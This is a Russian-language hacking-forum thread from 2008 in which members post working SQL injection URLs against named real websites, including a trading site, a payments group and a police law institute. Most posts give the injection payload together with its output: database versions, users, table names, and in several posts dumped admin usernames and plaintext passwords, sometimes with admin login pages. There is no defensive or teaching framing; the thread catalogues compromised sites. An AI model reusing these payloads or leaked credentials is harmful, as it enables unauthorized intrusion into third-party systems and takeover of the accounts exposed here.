ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5481  
Старый 15.05.2008, 20:57
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

интернет-трейдинг

http://www.netinvestor.ru/news.asp?id=851142+or+1=@@VERSION

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Юзеры и пасы
http://www.netinvestor.ru/news.asp?id=851142+or+1=(SELECT+TOP+1+password+fro m+usertable+WHERE+password+NOT+IN+(SELECT+TOP+10+p assword+from+usertable+WHERE+password+NOT+IN+(0x23 )))--
 
Ответить с цитированием

  #5482  
Старый 15.05.2008, 22:35
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,table_name,5,6, 7,8+from+information_schema.tables+l imit+16,1/*
нужная нам табла

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,column_name,5,6,7,8+from+info rmation_schema.columns+where+table_name=0x61646d69 6e/*

0x61646d696e = admin

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,concat_ws(0x3a,nick,password) ,5,6,7,8+from+admin/*

вот собственно и все что надо....

ах да, совсем забыл

http://www.comeniuskft.hu/admin.php
 
Ответить с цитированием

  #5483  
Старый 15.05.2008, 23:13
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://www.win-developers.com/forum/show.asp?id=606&fid=178++or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
 
Ответить с цитированием

  #5484  
Старый 15.05.2008, 23:25
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.motorcitysuns.com/team.php?id=-1+union+sel ect+1,,2, 3,4/*


version: 4.1.22-standard-log
user : oaklands_1@localhost
database : oaklands_1
 
Ответить с цитированием

  #5485  
Старый 16.05.2008, 00:02
Mr. P.S.
Участник форума
Регистрация: 27.05.2007
Сообщений: 237
Провел на форуме:
2256445

Репутация: 767
По умолчанию

fexco.com
the global payments group

Код:
http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,concat_ws(0x3203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/*
version: 5.0.45-community-log
user: splashg_fexco@web3.hosting365.ie
database: splashg_fexco

Код:
http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+1,1/*

Последний раз редактировалось Mr. P.S.; 16.05.2008 в 00:10..
 
Ответить с цитированием

  #5486  
Старый 16.05.2008, 02:00
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

РОСТОВСКИЙ ЮРИДИЧЕСКИЙ ИНСТИТУТ МВД РОССИИ

http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=(select%20db_name())--
DB- rui
User-SITE\IUSR_WEB3
 
Ответить с цитированием

  #5487  
Старый 16.05.2008, 13:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://haberolay.net/detay.php?id=-6389+union+select+1,2,3,4,table_name,6, 7,8,9+from+information_schema.tables+limit+160,1/*

http://haberolay.net/detay.php?id=-6389+union+select+1,2,3,4,column_name,6, 7,8,9+from+information_schema.columns+where+table_ name=0x62775f75736572/*

http://haberolay.net:2082/login/

version : 5.0.45-community
user : haberola_osman@localhost
database :haberola_osman
 
Ответить с цитированием

  #5488  
Старый 16.05.2008, 21:20
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

//*********************************

http://www.skyphoto.ru/forum/post.php?a=new_post&forum=-3+union+select+1,concat_ws(char(58),username,passw ord,email),3,4+from+u9758.sp_users+limit+1/*
forum: admin:AV-natali

//************************************

http://tchirkounov.ru/forum/post.php?a=new_post&forum=-2+union+select+1,version(),3,4/*
4.0.24_Debian-10sarge3
chirnalog@localhost
dbchirnalog

//***************************************
http://www.is.ru-b.de/gboard/post.php?a=new_post&forum=-3+union+select+1,version(),3,4/*
4.0.27-standard-log
p6866052@212.227.109.41
db18967113
//**************************************
http://wikipediawiki.org/post.php?a=new_post&forum=-1+union+select+1,version(),3,4
5.0.54
ulrik_db0@88.214.192.23
ulrik_db0

//***************************************
http://www.hurstwoodfarmpianos.co.uk/news.php?news_id=-16+union+select+1,2,concat_ws(char(58),username,pa ssword),4,5,6,7,8,9,10+from+user+limit+1+offset+0/*
marcus68:jerseybean
nawaraj:samsanjog
dain:cobnuts

pingpong@localhost
4.1.20
piano
Apache/2.0.52 (Red Hat)

//****************************
http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/*

atur@localhost
4.1.22
atur

Последний раз редактировалось neon_fx; 16.05.2008 в 21:33..
 
Ответить с цитированием

  #5489  
Старый 17.05.2008, 00:59
Mr. P.S.
Участник форума
Регистрация: 27.05.2007
Сообщений: 237
Провел на форуме:
2256445

Репутация: 767
По умолчанию

medinform.biz

Код:
http://www.medinform.biz/produser1.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13/*
4.1.22 : medinfo5main@localhost : medinfo5main

далее:

Код:
http://www.medinform.biz/produser1.php?id=-1+union+select+1,2,concat(name,0x3a,pas),4,5,6,7,8,9,10,11,12,13+from+users/*
Администратор : 123456789

=)

Последний раз редактировалось Mr. P.S.; 17.05.2008 в 01:15..
 
Ответить с цитированием

  #5490  
Старый 17.05.2008, 20:31
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

http://board.barnaul-altai.ru/index.php?advert=1837+union+select+1,2,3,4,5,6,7,8 ,9/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ